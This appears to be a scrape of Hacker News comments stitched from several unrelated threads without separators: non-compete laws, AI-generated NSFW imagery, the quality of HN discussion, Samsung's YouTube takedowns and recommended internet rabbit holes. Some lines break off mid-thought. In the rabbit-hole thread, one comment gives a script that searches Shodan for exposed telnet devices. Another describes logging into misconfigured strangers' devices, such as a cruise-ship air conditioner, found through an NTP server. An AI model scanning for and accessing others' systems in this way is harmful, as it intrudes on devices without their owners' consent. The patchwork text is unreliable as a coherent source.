Why can't Congress do something about this? Non-competes are clearly terrible for workers and should at the least be illegal without a severance agreement. If a company wants to keep me from working, they should pay for the privilege. Workers also need to start refusing to sign egregiously bad non-compete agreements.

I just signed one of these ridiculous clauses because pretty much everyone is just slapping this into their contracts now.

Law needs to catch up on this one, and fast. I like the idea of making non-competes enforceable only if you can prove malicious intent. Similar to how tax works: the onus is on the taxpayer. If you buy something and sell it at a profit, you must prove that the _intention_ was not to turn a profit if you want to pay capital gains tax rather than income tax on it.

Except the burden of proof must be skewed in favor of the employee, and the proof of intent needs to sit with the employer if they want to enforce. E.g., if I go to market and get an offer (say at some competitor), you have first right of refusal to give me a counter. If you refuse to counter, you cannot enforce your non-compete. This is fair, imho. There are lots of problems regarding "trade secrets" etc., but the law should be heavily weighted towards the idea of "innocent until proven guilty" for the employee.

This comes one week after - and in contrast to - Donald Trump promising in his first 100 days in office a five-year ban on White House officials and Congressmen becoming lobbyists, and a lifetime ban on White House officials lobbying on behalf of foreign governments.

What is most surprising to me about these stories today is how uncommon NDAs are. I read somewhere that 20% of workers in the US have signed one.

I don't know if this is a common experience, but my employer recently began putting NDAs in place and, in retrospect, I feel they took advantage of the ignorance of most of the employees (including me). They insisted that the NDA was "standard," and managers told us that there was no room for negotiation and pushed to have us sign immediately (they eventually relented to having it signed by the end of the following day).

This seems to miss how companies will react if enacted. If there's a freer flow on the talent side, corporations will want a freer flow as well. I would expect this to accelerate the current trend of converting more and more positions to contract or temporary positions rather than employment.

A ban seems heavy-handed. Since a noncompete essentially ties up an employee for a period, I'd prefer to see that tie-up treated by law as a continuation of employment at the existing salary. Surely companies must value their precious IP more than a single employee's salary for a year or two and if they don't, perhaps it isn't that valuable after all.

> The Obama administration on Tuesday also urged states to ban non-compete agreements that are not proposed before a job offer or promotion is accepted and said employers should not be able to enforce the agreements when workers are laid off.

Won't this just move the non-compete to be included in the job offer instead of the formal employment contract? That's a slight improvement at best.

I like how anyone even mentioning IP is downvoted to hell. It really shows you what market Y Combinator is in. Every single comment is either someone's personal narrative, or a ridiculous troll where "OMG WHY" is the only thing they say in each sentence. Wow, I wonder how this ever became law when Y Combinator commenters are so opposed to it?

On one hand, everyone is free to trade freedoms for gains (usually monetary - every contract restricts both parties' freedom), but on the other hand, you can't trade away certain freedoms that we view as fundamental.

Even though I am certainly no proponent of non-compete agreements I cautiously tend towards viewing such contracts as acceptable and valid.

You already limit selling your services the moment you accept a position as an employee, at least for the time you stay employed there. Contractually extending that for a mutually agreed-upon period doesn't strike me as that much different, at least as long as there was no coercion involved and both sides fully understood the consequences.

It's mesmerizing to see this NSFW detection applied in reverse, and it's even more interesting to observe your mind react to the generated images. You can see the sort-of-mons pubis patterns, the maybe-pubic hair, the perhaps-breasts and the suspiciously phallic appendages, complete with realistic colors.

Interestingly, the exposed skin suggests that the training dataset for the NSFW detection was skewed towards Caucasians, given how the synthesized images are almost completely devoid of skin tones other than light pink. Perhaps this is a good visual indication of unintentional 'bias' in datasets?

Some of these images, and those from similar projects, could be in an art gallery. They are art, provoking original, emotional responses.

Most people hear about self-driving cars, but not about the fact that machines have already begun to emulate human creativity in the most intimate way. For a while, this secret assault on our uniqueness will stay among us.

I am always blown away by how eerily similar these generated NN images are to the visuals experienced under psychedelic drugs. More so than any artist's depiction (and there have been plenty of those)... they just have the same "feel". Which of course leads one to the inescapable idea that there is a fundamental relationship here.

Some of the more abstract images at the beginning really remind me of Beksiński's paintings (some NSFW, but good, dark art overall): https://art.vniz.net/en/beksinski/ There's just enough abstract ideas and randomly included genitalia.

(Now I really wish someone did a Beksiński + photos mixer... there are ~240 samples just on that site.)

They have automated the surrealist movement. Which goes pretty much directly against the philosophy underlying the surrealist movement. Which the actual people involved with it would probably approve of, as they mostly all moved on from it anyway.

Has anyone ever thought about using all of reddit's porn subs for machine learning? There must be tens (or even hundreds) of thousands of images (kind of) neatly organized by gender, boob size, ass size, skin color, age, ...

If the author is reading this: per se means by itself, on its own. Today is not the first time I've seen "per say" written in its stead.

It shouldn't be surprising that many misheard words survived in a time when there was no widespread frequent exchange of written language and no writing standards or before that, when hardly anyone could even read. I feel this severely complicated our languages.

This is slightly on topic as well, because Natural Language processing has to deal with that now.

Going one step further with the nitpicking, just because I'm at it: the "per say" (or indeed, "per se") is only a filler in that sentence, like "really" or "very" often are. Really, though.

It seems possible to put other, non-porn images of people into the hopper and spit out an endless stream of perturbing, semi-pornographic trolling. That will probably happen, despite it being an awful idea, and it could even become commodified.

I'm a very average HN commenter. I do put in effort in writing here, trying to be civil above all and sharing my experience where it could be of interest. But I'm not Alan Kay, I've never rewritten a distributed deep learning system in Haskell using a genetically optimized Paxos consensus protocol, and my entrepreneurial experience is a loose string of "don't do this" case studies at best... So my comments certainly won't make anyone's "Best of HN" list.

To my surprise, the post has 28,000 views and 755 recommends so far. If I had written it as a HN comment, it would have got maybe 5-10 upvotes and perhaps spawned a short discussion thread about how unrealistic my idea was. (Please don't bother to criticize the content of the blog post in replies here -- I'm just using it as an example of blog vs. comment.)

I love reading HN discussions... But maybe there could be a site that slots between the HN and Medium formats, and lets you expand your comment into a blog post with minimal friction? Call it "HN Long-Form" or whatever. Ideally it would interface with the HN comment system so that you could mark your comment with something like "Promote to long-form" after you've written it. That would create an editable post on the long-form site. You could then later expand your comment there, and publish it on the long-form comment aggregator site. (Maybe I should just build this myself and see if it feels right.)

On second read, I'm not sure I agree with the first paragraphs of Dan's post at all. He seems to be saying that HN is terrible, but a handful of comments from star posters rise above the muck. I just don't think that's fair.

Yes, the cliché is that HN is a place full of mean, entitled semi-autists who will criticize your site's CSS whitespace formatting when you ask for business feedback... And of course there's a grain of truth to that (persistent stereotypes usually don't come out of thin air), but it misses the mark on two dimensions.

The first is that the criticism you get on HN is no worse than what other aspiring creative professionals suffer. I went to an art and design college, and the critique you'd get from students and even teachers was 99% of the time harsher than the HN style, yet no more guaranteed to be useful.

Consider a first-time novelist who spent years on a book. One day it gets critiqued in a newspaper. The professional critic might find that the author has a clumsy style, poor research, paper-thin characters, and seems to lack the life experience to even write about the topic. What do you do after that kind of criticism? You suck it up and go back to work on the next novel.

Making use of feedback is all about filtering and reducing multiple sources into something actionable. Nobody is right all the time. Your parents were wrong. Your teachers were wrong. Your peers were wrong. Your professors were wrong. Your boss was wrong. Your cofounders were wrong. Your investors were wrong. HN commenters were wrong. Still it's worth taking in all these inputs as much as you can.

The other dimension of HN comments is that they can be surprisingly deep. When an arts or culture topic makes it to the front page, it seems like someone comes out of the woodwork with the perfect personal anecdote. Whether it's Mondrian, Messiaen or Modiano, there's always someone on HN who happens to have a passion for it.

HN comments are underrated, but it's not just because of star power: it's everyone's contributions that make it consistently worthwhile for me.

When I worked with the HN post data, I noticed that some years ago HN users had correctly predicted the "Show HN" projects that later got funding. Those projects had more upvotes.

The more recent data has no such connection. It seems that the influx of users reduced the quality of judgement.

So one way to improve HN submissions and comments is to weight points by the user's tenure on HN.

I also suspect that early comments dominate late comments by the time factor alone. The sorting algo gives a brief advantage to new comments, but old comments are more visible. A post on the front page gets 30+ comments in the first hour, and latecomers can only post into the void. To address that, long branches could be collapsed by default, leaving only 2-4 visible messages per branch.
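For what it's worth, the tenure-weighting part could be as simple as something like this (a toy sketch with a made-up weighting curve, not HN's actual algorithm):

```typescript
// Toy tenure-weighted scoring: an upvote from a long-tenured account
// counts more than one from a brand-new account, with diminishing returns.
interface Vote {
  accountAgeDays: number; // tenure of the voting user, in days
}

function weightedScore(votes: Vote[]): number {
  return votes.reduce((sum, v) => {
    // Weight is ~1 for a new account, ~2 after ten years (log curve).
    const weight = 1 + Math.log10(1 + v.accountAgeDays / 365);
    return sum + weight;
  }, 0);
}

// Example: ten brand-new accounts roughly tie with five ten-year accounts.
console.log(weightedScore(Array(10).fill({ accountAgeDays: 1 })));   // ~10.0
console.log(weightedScore(Array(5).fill({ accountAgeDays: 3650 }))); // ~10.2
```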

HN comments are full of naive political opinion, groupthink, and a tendency to blind optimism on all things technology or new. Often older ways have merit too.

It's also probably the only place left on the net where, from the comments, I'll find out rapidly, and bluntly with citations, when I'm wrong (and yes, I'm often wrong on the Internet!), usually learn something new on the topic, and sometimes talk with the guy who invented it. My ADHD brain loves the depth to which side topics can get explored, and being surrounded by people far cleverer than me.

I think HN needs a way to easily find the top comments. There are absolute gems deep in discussion threads, but you'll need to spend a lot of time reading to find them. Hence, it's very nice of Dan Luu to list some of his favorites.

The top root-level comment on each comment page is obviously easy to see, but good comments deeper in the comment tree are easily lost. It would be great if, e.g., the top 5% of comments by votes on a page were highlighted in some way.
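As a rough sketch of what that could look like (my own illustration; the 95th-percentile cutoff is arbitrary):

```typescript
// Flag every comment on a page whose score is at or above the
// 95th percentile, so deep-thread gems stand out.
interface Comment {
  id: string;
  score: number;
}

function topFivePercent(comments: Comment[]): Set<string> {
  if (comments.length === 0) return new Set();
  const sorted = [...comments].sort((a, b) => a.score - b.score);
  const idx = Math.min(Math.floor(sorted.length * 0.95), sorted.length - 1);
  const cutoff = sorted[idx].score;
  return new Set(comments.filter(c => c.score >= cutoff).map(c => c.id));
}
```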

Perhaps a workable solution would be to just follow the comment listings of smart people. Guess I'll at least try that.

Recently I've been thinking about doing a couple blog posts that summarize the HN thread for a given article* in perhaps ~1500 words. I think of it like the approach that r/tabled uses for AMAs on Reddit (example: [1]).

Would others find this interesting, or would you rather just read the comments yourself?

A second idea is a daily / weekly update of comments from all of the people you're interested in "following" on HN. You can do this very manually right now. I think it could be an interesting proof of concept.

*When I say one article, I really mean the aggregate of recent links around that topic as discussions are often merged or commenters bring information from other sources into the commentary for whichever link takes off on that topic. Often that is the most original source, but not always.

I absolutely love comments on HN, and they are probably the main reason I read this site a lot. Sometimes the posts themselves are quite self-explanatory from the title, and I just go straight to the discussions.

These criticisms, when phrased in the manner of the post ("HN is full of mean and rude people"), suggest by omission that there's some kind of internet-forum Nirvana out there where everyone's nice all the time and nobody ever says mean things or is rude. ("HN is full of mean and rude people [... unlike place X, which is always great all the time]")

But the thing is, once a community reaches a mid-to-large size, certain kinds of people are always going to think it's full of jerks and trolls, and that its golden age has long passed--regardless of the community's age or actual composition.

I run one of the largest online writing communities, Scribophile. We've been around going on 9 years, and I personally pride myself on the reputation we've earned as a friendly and supportive community. By and large people seem to agree. And yet every now and then we still get people complaining that Scrib members are out to get them, that everyone is mean, that Scrib's golden age has passed. (I started hearing that same golden-age comment about 6 months in, by the way.)

I think the truth is more like the faceless, voiceless, anonymous internet makes it really easy for people to both a) be jerks, and b) misinterpret harmless posts as people being jerks. I think this phenomenon happens in every mid-to-large sized community, ever. And I don't think it's really helpful to criticize any community of that size as having nothing but mean people, or trending towards meanness.

I often find myself searching through old HN comments for all kinds of things. Just off the top of my head, I've searched for comments on Redis, ZFS, Raft, SQS, ZMQ, message queues, RDS, connection pools, and ECS in the last few days. I've learned quite a lot from reading comments by people with way more experience in these matters than I have. And that's probably less than half of my searches. A Google search might give me some good stuff, and Stack Exchange too, but HN comments are indeed underrated.

I prefer cynicism over the unthoughtful, inconsequential comments that flood several discussion forums I have come across. "Nice article", "Great write-up" - and the next thing you know, you have created a place where people are only interested in submitting their articles and getting them upvoted rather than making meaningful contributions.

People want to make good contributions here and that's something that differentiates HN from other news aggregators.

I greatly miss Usenet newsgroups -- NNTP ones, not Yahoo or Google Groups, or any of the pale HTTP imitations. The best were usually moderated, of course, but even unmoderated ones often had a high signal-to-noise ratio. I imagine how they might be now with rich-text rendering, e.g. embedded TeX and images.

Good newsreaders (MT-Newswatcher on MacOS springs to mind, but also fast console programs like tin) really helped. There were no 'likes' or 'vote' buttons. But there was the ability to whitelist or blacklist certain authors by adding them to a user's 'killfile', leading to the wonderfully pithy permanent downvote reply:

I miss the deep expertise often on display on forums like Slashdot in the past, which is conspicuous by its absence here.

In many ways this is more of a professional board than a personal board. A lot of folks here are in the profession and don't seem to speak their mind, lest they lose career opportunities. This also seems to promote an affectation of expertise and an authoritative tone, even on subjects commenters may not know much about.

There is offhand dismissal of dissent as 'resistance to change' and a serious lack of scrutiny that often allows broken technologies and services to be hyped endlessly, until people come back months or years later to report deficiencies, but by then the train has left the station.

And any forum that promotes downvotes to signal dissent cannot by design promote diverse discussion and will naturally coalesce around a 'socially acceptable' consensus.

Reading this article and thinking back on the users whose comments I enjoy reading on HN, I think a neat feature might be the ability for a logged-in user to "favorite/mark" specific authors. Those authors would then get some particular character in front of their name (or a different color) so that they stand out more. I do agree with this post that seeing certain names and knowing the signal ratio will be higher is nice. We may just need a better way to discern those names when scanning a comments section.

I wish there was more research in moderation systems. I think it is a fascinating topic, because it can make or break an online forum. And perhaps it even has applications in political decision making.

Comments (and previously blogs, but not so much anymore) can have more insight than news articles because they're based on first hand experience. Journalists don't have that, and the organization they work for often has problematic incentives which they push onto the writer.

HN comments are indeed very terse, to the point of being unfriendly. It bothered me at first but now I'm used to the style and sort of like it.

The comments on that "Lenovo is blocking Linux on some new laptops" story a while back were truly abysmal. I think that's the only time where I was really disappointed by HN comments. Now obviously (and as many of the more thoughtful commenters pointed out) this was just a case of missing support in the Linux kernel. There was no "secret deal" between Lenovo and Microsoft that the customer service rep on that forum revealed. Intel posted some patches to fix this a few days ago: http://marc.info/?l=linux-ide&m=147709610621480&w=2

This article and its comments are surprisingly negative. I've long held the opinion that HN is the best aggregator out there, and the comments are top notch as well. Far better than Reddit, subreddits like /r/programming+sysadmin+netsec etc, /g/, Slashdot, and the list goes on.

My feeling is that a large part of Hacker News has, at some time within the last 10 years, actively contributed to Stack Overflow. From my own experience, I learned how to ask and answer technical questions and participate in a technical discussion there while trying to keep it non-political, and I feel that has helped me provide good comments on HN from time to time.

So I would challenge the sentences:

> And yet, I haven't found a public internet forum with better technical commentary.

I have: it's Stack Overflow. Even though it is not a public internet forum proper, I've found some awesome technical commentary there, and I think it might have helped HN a lot on that side.

> when people make comments that aren't just reasonable-sounding but are actually correct, those comments tend to get upvoted

For a while, I found that on pages with lots of comments the most interesting ones were to be found at the top and, buried between actual dross, at the bottom.

That might have changed, I don't see it that much anymore. But that could be a side effect of something even less desirable. I think some people may have started flagging whole articles when the discussion has "too many" comments they dislike. I can't prove this, of course.

This article and the (currently) highest rated comment with the Medium article is making me want to write more.

I've always considered starting a simple blog where I just write short commentary on articles I've read that I feel are incorrect or incomplete. One thing that has held me back is knowing I'm not a brilliant writer. However, I am going to try to keep in mind the great blog post by Paul Graham that stresses always writing in short sentences. Good luck, me!

Coming from a certain frame, context, and worldview given to someone by his/her parents, many comments are not ill-intentioned but come off as unhelpful or negative. A problem with moderation on the web is that, for willing people, it is hard to grasp why you were given the moderation you got.

An idea I'm toying with is to allow meta-comment reactions to comments. They would extend horizontally (as opposed to vertically for non-meta comments) and allow medium-to-highly experienced users to provide meta-comments (feedback).

> For the last couple of years (ish?), the moderation regime has been really active in trying to get a good mix of stories on the front page and in tamping down on gratuitously mean comments. But there was a period of years where the moderation could be described as sparse, arbitrary, and capricious, and while there are fewer bad comments now, it doesn't seem like good moderation actually generates more good comments.

I agree that there was a major change in moderation 1-2 years ago. But I think it's worse rather than better. The moderation is more arbitrary and capricious now (in particular it's a lot more active during the hours when the US is awake), and there are a lot of positive-but-contentless fluff comments and even humour, both of which are inimical to what made HN great.

Yet another human bemoaning the fact that when myriad humans randomly get together on the internet, some folks are clueless, some folks are not nice, some folks write poorly, etc. There are things that can be done to improve online discussion. But expecting everyone to be equally knowledgeable, savvy, etc. is simply not a reasonable expectation.

> comments are often gratuitously mean, and people will often defend gratuitously mean comments by claiming that it's either impossible or inefficient to convey information without being mean.

> Most of the negative things you hear about HN comments are true.

I think it is interesting how the relatively anonymized nature of the internet has a similar effect on people of all stripes. HN readers, I believe, are among the more intelligent, or at least curious, of our species. The same is true of another popular internet forum, Stack Overflow. Yet there exists an air of negativity that is far more ubiquitous than in "real" life, where people are not anonymous. And this is true of most other internet forums as well, where more of the general populace participates. It shows, in a strange way, that people just have a lot of negativity to vent, that the internet has made venting it really easy and without consequence to the rest of one's life, and that this remains true regardless of one's interests and general intelligence.

So true. I often jump to the comments before I read the linked article. The comments are very often of better quality, and more informed, than the article itself. HN is unique on today's internet; it's a great community and I hope it stays that way.

HN comments are moderated by the hive-mind, which, like any hive-mind, is against diversity. (I don't mean the moderators, who are completely fine and, in my case, always clear about what was off-topic and in need of flagging, but the community that flags.)

Of the dozens of accounts I had, some have reached karma levels of awe, and some were met with extreme flagging and disapproval.

The most pleasant and interesting discussions are mostly around technical and scientific themes.

When it comes to diet and lifestyle issues, comments are flooded with a bunch of anecdotal claims, unscientific babbling, and extreme boasting.

I come here for the content. Before I started frequently coming here, I used reddit exclusively. I didn't "get" HN at the time. But at some point it started growing on me; I started coming here more and more often, and right now it's my primary source of random information. I still reddit, but more for leisure and time-wasting than anything else.

I don't check the comments much, though.

As a side effect, it has also changed my browsing habits; before, it wasn't difficult for me to go down to the 10th page on reddit.

The truth is that articles are more often a waste of time than comments (comments are often a lot shorter and simpler to grasp), so I have to disagree here: I often find myself reading the comments before clicking on the article, to save time. And I'm not the only one.

I feel the same. Most often, the comments are way more interesting than the links they're commenting on. This led me to calm down on commenting all the time, because I felt like I needed to make good-quality comments in order to compare favorably to the rest of the discussion and to contribute to the community. I wonder if others feel like this and have decided to hold back on commenting?

I would like to propose Wikipedia-style edit history and comment-deletion milestones for the HN comment system, and in addition, a comment redaction facility that works like the redaction of classified documents.

A way to reduce disruptive comments might be to make one downvote cost one karma point.

Down-voting should be for disruption, not ignorance. Ignorant comments are fine. Get them out there so they can be aired and corrected. Laymen get to know what they think. Experts get to know what laymen think. Occasionally there's a good idea.

Talk is cheap and we should do more of it. The alternative is people being far more ignorant than they already are. But silently, in private, with more potential for harm.

The bellwether of a bad but possibly technically interesting HN comment is one that begins with a humblebrag: "One time a Fortune 500 company hired me to re-write their entire web tier using Django" or "last year, for fun, I wrote a fully-functioning TLS implementation in node".

Such nonsense (or at best, unneeded information) is intended to provide credentials so that the reader will take what follows more seriously. But ironically it only serves to erode confidence.

Wonder if the attention on YouTube here will inspire Google to fix the financially and politically motivated 'infringement' takedowns.

Eg, during the takedown process, have something like:

> [ ] I understand that satire and political commentary do not in themselves constitute copyright infringement, and that I am not filing this notice on the basis of the video satirizing or making commentary on my copyrighted content.

> [ ] I understand that incorrectly flagging satirical or commentary videos that mention my trademarks but do not infringe upon my trademark rights may delay response to future infringement filings.

Or something similar. IANAL. Complainants must tick the boxes to be able to submit.

Here we are again, and this thread is full of comments about whether this ran afoul of the DMCA or whether there's a way to adjust the system so that these claims are more costly to the claimant.

We need to break open the head here, people! We're scientists, right? Step back from your political ideologies and your fears and tell me what the real problem is with this biological system.

Right: it's that a single actor can make the decision to censor these things. It's fundamentally a weak link problem.

Whether or not we fix DMCA, which I'm sure we will, we need to fix the problem that the weak link exists in the first place. A centralized Youtube will not do for the information age. Our organism must build immunity such that, no matter the tantrums of the state, nobody is capable of giving in and handing over the lollipop.

It's a funny story, but it also shows how pathetic (IMO) some companies and organizations become. They just don't realize the cat is already out of the bag. "Damage control" should not be used for censorship. This is clearly fair use (satire).

And in general about YouTube and similar companies: This is what happens when the court principle of innocent until proven guilty is inverted to be guilty until proven innocent.

There is a reason why freedom of speech is the First Amendment in the US constitution, and Google (and other companies) should adhere to and respect the intentions behind it.

This is why we need strict, very harsh penalties for abuse of copyright (and patent) law. This has NOTHING to do with copyright, yet these Samsung assholes file claims with YouTube? How about a fine of 1% of net revenue for every wrongful copyright claim (like, but not limited to, a bad DMCA claim), increasing by 1% for each subsequent wrongful claim (with no limit, other than that at 100% you lose the business)? But of course, this will never happen. Personally, I see these kinds of attacks as justification for piracy and for willful disobedience of our incredibly stupid laws (in the US).

I don't know what the most abused laws are, but I'd say copyright would probably be in the top 10 if there were such a list. I wish people who repeatedly abuse copyright takedowns would get a large fine. The fine should be split between the uploader and the service provider, and the abuser should have to pay all legal fees on top of it.

Maybe this has nothing to do with the DMCA and more to do with Samsung spending millions of dollars on YouTube advertising (speculation). If one of the major sponsors supporting your platform threatens to pull back advertising dollars, maybe you bow to their requests. Maybe.

Samsung must really not want to be in the mobile phone business anymore. The dim-witted actions they're taking with regard to these videos will only turn more people off. I for one will never consider a Samsung product now, and not just their mobile phones. They're set to join Sony on my relatively short "do not buy" list.

I guess Samsung will keep a lonely Sony company on my "do not buy" list; too bad. BTW, in the US, last I heard, parody is a protected form of speech. So I think DoctorGTA has the law on his/her side (assuming he lives in the US).

These people are so dumb and just don't get "it." Samsung is so dumb, they are very dumb, for real. So dumb, so dumb, so dumb, so.... they climbing in your windows trying to rape your GTA and youtube accounts. ([0])

All this is going to do is encourage tens of thousands of young kids to figure out what things like "DRM", "free speech", "EFF", "privacy", "copyright" and the like mean. Maybe we get a few good lawyers out of this, a lot of great parody and a lot of great art.

I stumbled into Venkat's blog about two and a half years ago and I'm still trying to find my way out. The rabbit hole gets even deeper when you look at his list of recommended reading. The material on John Boyd and OODA loops in particular has been bouncing around my head for about a year. Ribbonfarm quickly turns into a choose-your-own-adventure type of experience, as it's very easy to bounce between articles and start looking up everything you don't know.

If you're interested in getting below the surface level of how organizations, teams, and business cultures work Ribbonfarm is the best place I know of that really digs into the details. If you're expecting the typical "be a leader, not a manager" platitudes, then you'll be disappointed.

My current rabbit hole has been the Worldbuilding Stack Exchange (http://worldbuilding.stackexchange.com/), which is (ostensibly) for writers working out scientific or historical justifications for the worlds they invent.

Some of the thought that goes into the answers is really cool. Good recent ones are:

The US Civil War has been mine for the last couple of years. The sheer volume of history and contributing factors, decades of build-up, the aftermath, the effects on the US today, etc. My goodness, the economics of the whole thing are just fascinating.

All the internet debates I saw when the confederate flag came down got me really interested in how so many people could know TOTALLY different things about the most historically significant event in the country.

Now I've got about 12 books covering things in different ways (and there are so many more). Thanks to the Library of Congress and Google's efforts to scan books it's really easy to check citations as you read when you're having those "There is no way that's real" moments followed by "Holy crap! That's real?!?!"

The whole thing has sparked an overzealous interest in history, which is the subject that interested me the least when I was younger. Now I give serious consideration to pursuing a doctorate one day with the aim of being a History professor when I get closer to 50 (which is still a decade or so off).

I'm partial to everything2.com. Back in the early '00s, everything2 tried to be a Wikipedia where people could post multiple entries on a topic. The best part is reading 16-year-old long-form essays about places. The recent stuff is short stories, but the essays about the Bay Area from the peak of the bubble are fascinating.

I always find the EAS activation tone to be kind of bone chilling (which I suppose is its intention). I hear it so infrequently here in Canada that it really grabs my attention immediately.

Listening to the fake ones online probably makes it worse, though. When I heard the emergency alert tone come on the radio while driving from Toronto to Ottawa, I checked the skies for UFOs. Ended up just being a tornado warning. :)

TVTropes is the big one, the vortex from which all other rabbit holes stem.

The SCP foundation is also excellent, and The Digital Antiquarian is my new favorite.

Fallen London is a browser MMOCYOA on steroids, and it's glorious.

The Jargon File (before ESR ruined it with the latest round of updates) was amazing, and still is great fun.

Bash.org is another classic rabbit hole, although far from the best for that purpose.

And YouTube contains many rabbit holes, but my favorite by far is Tom Scott's channel. Also of note are Tom & Matt's Park Bench, where he vlogs with Matt Grey on a semi-regular basis; Yahtzee Croshaw's channel, where he used to play games with Gabriel Morton in his "Let's Drown Out" series; and Channel Awesome. Just, all of Channel Awesome.

The Bureau of Labor Statistics (http://www.bls.gov/) is just fascinating enough and just badly organized enough that I never seem to be able to get to the same useful piece of information twice. And thus I constantly find myself looking at other interesting facts about the US labor force.

I grew up when the History Channel was nicknamed "the Hitler channel". I've read Manchester's The Last Lion and Shirer's The Rise and Fall of the Third Reich, and will soon be ordering Ullrich's Hitler: Ascent. Saving Private Ryan is in my top 5 favorite movies of all time.

Back in the mid-'90s there were two rabbit holes I loved to visit. One of them was the Monty Python website :-)

The other one I haven't been able to track down. I'm hoping someone here can tell me what happened to it. It was an art site called "The Place" hosted by a university in Canada. It was a mixed media site with art, poetry and short stories. Does that ring a bell for anyone? I loved that site and wanted to visit it again many times. But "The Place" is a difficult term to search with these days.

I listen to Robert Greenberg's classical music appreciation audio courses. He has published courses on Bach, Mozart, Beethoven, Liszt, Schumann, Mahler, Verdi, Wagner, Stravinsky, Tchaikovsky and also on horizontal subjects such as orchestral, piano, opera, baroque music, romantic music, symphony and quartets (and much more).

Greenberg is a gifted speaker, and a composer and music professor himself. He shares a burning passion for everything classical. If not for the informational content, then at the very least it's worth listening to him to soak up some of that passion.

After picking up some basic notions about composers and music genres, I started a YouTube safari for unknown music and composers; I am 7 years into my search already. I have listened to hours of classical music every day since I started. YT is a treasure trove of historical recordings; you can do comparative listening and refine your listening abilities.

There are so many composers almost nobody has heard of, even professional musicians, that it's mind-boggling. After all, classical music has a long history, hundreds of years in the making, and the level attained by Bach 300 years ago was already (and remains to this day) cutting edge.

Imagine how interesting it would be to browse videos and papers from 300 years of computer programming history. We are overwhelmed even by the production of the last decade. Classical music has such a wonderfully deep history that it is endlessly entertaining.

Currently my favourite time-wasters are learning channels on YouTube, though not the "weird" ones like Vsauce, which I find pretty unwatchable. I like SciShow / SciShow Space, even though that's borderline weird :)

It's a little bit dated now, but the C2 wiki is a fun place to read about software development. There are quite a lot of patterns, anti-patterns, practices, rambling debates and just generally interesting ideas: http://wiki.c2.com/?DesignByCommittee

Orion's Arm is a collaborative world building project for the far future. The articles on monopole physics and wormholes are quite detailed, and the implications of higher levels of sentience are very interesting. http://www.orionsarm.com

Reading about neolithic archaeology is way more fun than you might think. 10,000 years ago people built these huge sites with literally stone-age technology, and the nature of their rituals and beliefs is mostly unknown.

Shodan is a search engine for devices on the Internet. Looking at other people's queries is a good way to get started. Every time you think "there's no way someone would connect one of those to the Internet," you find out that at least 10 people have gone and done just that. https://www.shodan.io/explore
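
And if you'd rather script it than click around: Shodan also exposes a REST search API, so a few lines of Node will list matches. A minimal sketch, assuming the documented /shodan/host/search endpoint; SHODAN_KEY and the query string are placeholders, not recommendations:

    // Hedged sketch: search Shodan from Node 18+ (global fetch available).
    const key = process.env.SHODAN_KEY; // placeholder API key
    const query = encodeURIComponent('port:23 product:"BusyBox"'); // illustrative

    fetch(`https://api.shodan.io/shodan/host/search?key=${key}&query=${query}`)
      .then(res => res.json())
      .then(data => {
        for (const m of data.matches || []) {
          // each match carries the IP, port and a banner excerpt
          console.log(m.ip_str, m.port, (m.data || '').slice(0, 60));
        }
      });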

Running an NTP server in the public pool gives you the IPv6 addresses of all kinds of whacko IoT stuff. Every once in a while p0f can't figure out a TCP/IP stack that's connecting to my server, so I connect back and there's sometimes a really weird device with an open telnet or HTTP port or something. About once a month I have to call someone to tell them that they misconfigured their firewall when they turned on NTP and I'm logged into an air conditioner on a cruise ship or another bizarre combination of thing and place that I never thought I'd ever say out loud. Browsing the logs is a never-ending source of amazement.

PSA: connecting to public NTP servers exposes you to people like me, don't do it unless you have to.
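
For the curious, the exposure is easy to see because the whole client side of the protocol is one UDP packet. A minimal SNTP query from Node, sketched from nothing beyond the RFC 4330 packet layout; the server operator sees your source IP and can fingerprint your stack (p0f-style) from this single exchange:

    const dgram = require('dgram');

    const sock = dgram.createSocket('udp4');
    const req = Buffer.alloc(48);
    req[0] = 0x1b; // LI=0, Version=3, Mode=3 (client request)

    sock.on('message', (msg) => {
      // Transmit timestamp (seconds since 1900) sits at byte offset 40
      const unixSecs = msg.readUInt32BE(40) - 2208988800; // NTP -> Unix epoch
      console.log('server time:', new Date(unixSecs * 1000).toISOString());
      sock.close();
    });

    sock.send(req, 123, 'pool.ntp.org');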

I have MythTV set up so downloaded conference videos show up as a channel, just like a recording, so I can sit on the couch and watch a Clojure conf or whatever as if it were a recorded PBS program. Very convenient.

As a side issue, I raided archive.org for hilarious black-and-white silent films of Buster Keaton, who was quite a comedian about a century ago.

It has links to architects and those pages in turn have links to beautiful buildings. Also the wikipedia pages of art museums tend to be awesome timesinks as well, you can click through every artist and all of their famous artworks.

I don't use YouTube at all for music recommendations/discovery but every once in a while, I'll chance upon something amazing.

A comment on an upload of Seventh Wonder's The Great Escape[0] led to my discovering Shadow Gallery's First Light[1], which I enjoyed almost as much. (Almost. SW's track, based on Harry Martinson's 'Aniara' poetic cycle, is, in my opinion, at another level. Martinson was awarded a Nobel prize for his work but unfortunately committed suicide as a result of fierce criticism of that decision.)

* Rogue waves (it is not that deep of a hole but for some reason I find it interesting).

* Knot theory and category theory (again not sure why).

* Social Psychology on Wikipedia

* Ben Thompson's Badass blog (more for humor, and a little old now; not sure if it is still updated) [1]

* If you are an older mid-to-late-30-something like me, X-Entertainment [2] used to be an awesome rabbit hole (no, it is not a porn site). Sadly it is now a very, very broken rabbit hole with collapsed tunnels all over. The author's (Matt's) penchant for '80s crap ultimately succumbed to utter disorganization and a lack of proper backups. It is a 404 wasteland. I recommend googling "x-entertainment and he-man" (yes, it is scary to google such terms, but trust me).

Encyclopedic, opinionated, humorous, and even quantitative guide to 20th-century pop and rock, from the point of view of a Russian linguist [1] who thinks The Beatles, The Who, The Rolling Stones, and Bob Dylan have never been topped:

Even if you disagree with him on details, if you have similar taste, you can basically look up any album and see which songs might be hidden gems. It's also amusing to read his take on just when a particular band began to decline in quality.

damninteresting.com is where I first read about the Great Molasses Flood, amongst a slew of other bizarre non-fictional events & people. The wordsmiths there make the bizarre accounts even more damn interesting.

2) reddit.com is a never ending source of entertainment if you know how to use it:

2.1) Go to any sub which kind of interests you and sort either by "top" or "controversial" for "all time". "controversial of all time" is especially interesting if you apply it to subs like /r/relationships (if you are into that kind of thing).

My favorite channels are This Old Tony (his newer videos are incredibly well made and very funny if you like dry humor. Check out his video on how to cut threads on a lathe https://www.youtube.com/watch?v=Lb_BURLuI70), Abom79, Clickspring, Keith Rucker, Keith Fenner, Stefan Gotteswinter, Walter Sorrells, ...

